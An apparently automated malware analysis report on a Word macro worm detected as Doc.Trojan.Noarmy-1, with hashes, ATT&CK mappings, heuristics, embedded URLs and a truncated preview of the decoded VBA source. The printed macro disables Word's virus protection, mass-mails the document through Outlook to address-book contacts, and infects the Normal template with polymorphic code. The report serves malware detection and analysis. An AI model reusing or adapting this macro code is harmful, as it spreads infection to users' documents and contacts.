Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e66542dc8f4559bc…

MALICIOUS

Office (OLE)

144.0 KB Created: 2000-06-27 10:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 459e3544d124c2ad65dbae01644e3951 SHA-1: b2d6a122c2709da964bc6d43f8cff3797a52f395 SHA-256: e66542dc8f4559bca76a3b579272062256a611da015321e8a7d498459268e972
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a high-confidence detection for an obfuscated auto-exec VBA loader within the Document_Open macro. This macro utilizes CreateObject and appears to be designed to download and execute a second-stage payload from one of the embedded URLs. The presence of the 'Doc.Trojan.Noarmy-1' ClamAV detection further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Trojan.Noarmy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Noarmy-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sn.agat.net In document text (OLE body)
    • http://altern.org/gigm/service.htmIn document text (OLE body)
    • http://www.donquichotte.comIn document text (OLE body)
    • http://www.multimania.com/antisnIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 124653 bytes
SHA-256: f146233cc75d30f0a8e5ab4eba99f3774c7d72de1568ad90250040477f1d724f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NOSN"
Attribute VB_Base = "1Normal.NOSN"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim h7, g8, j1, k2, j8, l1, m5, l8, a5, _
d3, g6, h3, k1, k5, g3, n6, h5, j5, k7: Dim e8, b9, a7, d6, c5, e2, g1, l3, l9, n2, m1, h8, l5, i1, i7, e4, c7, _
c4, f3, h1, d8: Dim g5, _
e1, m4, b3, d4, f7, i3, g2, e5, d2, a4, a3, a2, c2, d1, c3, c1, b2, b1, a1 ' nrotylgytee
Private Sub Document_Open() ' vkljft
On Error Resume Next: Call f1 ' aqbapxoroqvwzkm
Call f2 ' ufuv
Randomize: Select Case System.PrivateProfileString(j1, k2, j8) ' sneftrzdxprdbwr
Case Is <> j1 ' prnzbaoycly
System.PrivateProfileString(j1, k2, j8) = 1&: Case Else ' qpawhteutgnjmx
Options.ConfirmConversions = m5 ' piohsrspwkfgtl
Options.VirusProtection = m5 ' wxdqxnlngwqnwmk
Options.SaveNormalPrompt = m5: End Select: d8 = a5: Set c4 = CreateObject(d8) ' lhsjauxfiizadnw
Set f3 = c4.GetNameSpace(l8): Select Case System.PrivateProfileString(j1, d3, g6): Case Is <> h3: Select Case c4 ' pokieyiqafb
Case k1: f3.Logon k5, g3 ' fzwsekvovjumwzq
For i = 1 To f3.AddressLists.Count: Set g4 = f3.AddressLists(i) ' grkcmgai
Set h1 = c4.CreateItem(m5): h2 = g4.AddressEntries.Count ' bgguzxq
b6 = m5 ' kvkfpkqyipjdtp
For j = 1 To h2: Set j2 = g4.AddressEntries(j): Select Case Len(j2.Address): Case Is _
> 4: Select Case InStr(Len(j2.Address) - 3, j2.Address, n6, vbTextCompare) ' ofynhrtrmkzblo
Case Is <> 0 ' yoiniqmfzsojoyd
h1.Recipients.Add j2 ' iszxzsknurq
b6 = b6 + 1 ' wcwhhxegwg
End Select: End Select ' slgc
Select Case b6 ' jgvra
Case 50 ' hychgo
Exit For: End Select: Next j: Select Case Rnd(): Case Is < 0.33: h1.Subject = h5: h1.Body = j5 ' utrnojfdfgkjnn
Case Is < 0.66 ' roeeusoapnne
h1.Subject = g1 ' fuqjqdkgvcaufh
h1.Body = l3 ' avkjbahnlsaey
Case Else: h1.Subject = l9 ' elnelxuumd
h1.Body = n2 ' scqzhty
End Select: h1.Attachments.Add ActiveDocument.FullName ' cmtzpngqeei
h1.Send: Next i ' ozojl
f3.Logoff: End Select ' smtgixupguodf
System.PrivateProfileString(j1, d3, g6) = h3: End Select ' uiyawfv
Set n1 = ActiveDocument.VBProject: Set i6 = _
n1.VBComponents.Item(1): Set n1 _
= NormalTemplate.VBProject ' mvuhefepx
Set k3 = n1.VBComponents.Item(1): i2 = False: Select Case InStr(1, ActiveDocument.Name, m1): Case False: Select Case i6.Name ' jxddlhfccxxy
Case Is <> g6: Set b5 _
= k3: Set f5 = i6 ' gpzhxnymenrjryx
i2 = True ' fpjqqebpytzw
End Select: End Select: Select Case k3.Name ' cothmb
Case Is <> g6 ' mxivvkgror
Set b5 = i6: Set f5 = k3 ' pbpxygqemywws
i2 = True ' gvwfzszvm
End Select ' lfjonjgiz
Select Case i2: Case True: i4 _
= b5.CodeModule.CountOfLines - 1 ' wynohjmgwcg
c8 = f5.CodeModule.CountOfLines: Select Case c8 ' iadcnub
Case Is > _
0: f5.CodeModule.DeleteLines 1, c8: End Select ' iove
c6 = 1 ' lthq
c9 = "": j3 = "": a6 = 0 ' dysxmghewoelr
For l2 = 1 To i4: h4 = b5.CodeModule.Lines(l2, 1) ' ctbh
i = 1 ' acihnxfteblgde
f4 = InStr(1, h4, Chr(39)) ' mixzjqj
Select Case f4 ' kjhxbtokwotut
Case 0 ' tcclf
f4 = Len(h4): Case Else ' gkobo
f4 = f4 - 2: End Select: Do ' qyrbbyfgqzzne
j = InStr(i, h4, Chr(32)): Select Case j ' npevw
Case 0: j = Len(h4) + 1 ' bhrujzdylhzo
b8 = True ' pyjcogbhesuf
Case f4 + 1: b8 = True ' lwlhje
Case Else ' ertgcioslly
b8 = False ' biljksmdqismt
End Select: n5 = Mid(h4, i, j - i) ' czrvaeobz
Select Case b8: Case True ' bdgxftgmxphz
f6 = b5.CodeModule.Lines(l2 + 1, 1) ' piknl
k4 = InStr(1, f6, Chr(32)) ' dkateku
Select Case k4: Case 0: j3 = _
"": Case Else ' vkigfkzl
j3 = Mid(f6, 1, k4 - 1) ' bzto
End Select: End Select ' kkxeqbhjgvg
Select Case n5: Case k7 + Chr(58): n5 = e8 + Chr(58): Case e8 + Chr(58) ' kmonhjq
n5 = k7 + Chr(58) ' ykaewtxctjnfu
Case k7 ' mmuwski
n5 = e8: Case e8 ' rdyimwntbzzdup
n5 = k7 ' pfovdg
End Select ' izqznso
Select Case h6: Case False: Select Case Rnd() ' pxmytuxrzhbjpm
Case Is _
< 0.02: h6 = True ' vuouikpjyvqki
Case Else ' bxumhidsun
h6 = False: Select Case b8: Case True ' ximlosne
Select Cas
... (truncated)